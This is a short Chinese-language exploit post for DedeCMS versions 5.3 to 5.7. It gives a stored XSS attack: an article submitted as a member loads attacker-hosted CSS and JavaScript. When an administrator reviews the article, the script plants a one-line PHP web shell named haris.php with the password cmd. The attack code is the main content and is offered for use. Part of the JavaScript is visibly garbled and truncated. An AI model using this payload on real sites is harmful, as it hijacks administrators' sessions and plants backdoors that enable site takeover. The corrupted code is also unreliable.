dedecms xss 0day通杀所有版本 可getshell

////////////////////////////////////////////////漏洞虽老，但方法永远不会过时////////////////////////////////////////////////

漏洞原因：DEDECMS由于编辑器过滤不严，将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢？能getshell的都算0Day（鸡肋发挥起来也能变凤凰）

　　目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个：

1. 开启注册

2. 开启投稿

注册会员-发表文章投稿，内容如下填写：

在你自己的网站xxx.com上新建xss.css内容如下：

body{background-image:url('javascript:document.write("")') }

在你自己的网站xxx.com上新建xss.js 内容如下：

varrequest =false;if(window.XMLHttpRequest){request =newXMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType('text/xml');}}elseif(window.ActiveXObject){varversions =['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length",params.length);xmlhttp.setRequestHeader("Connection","Keep-Alive");xmlhttp.send(params);}

　　当管理员审核这篇文章的时候，将自动在data目录生成一句话haris.php。密码cmd。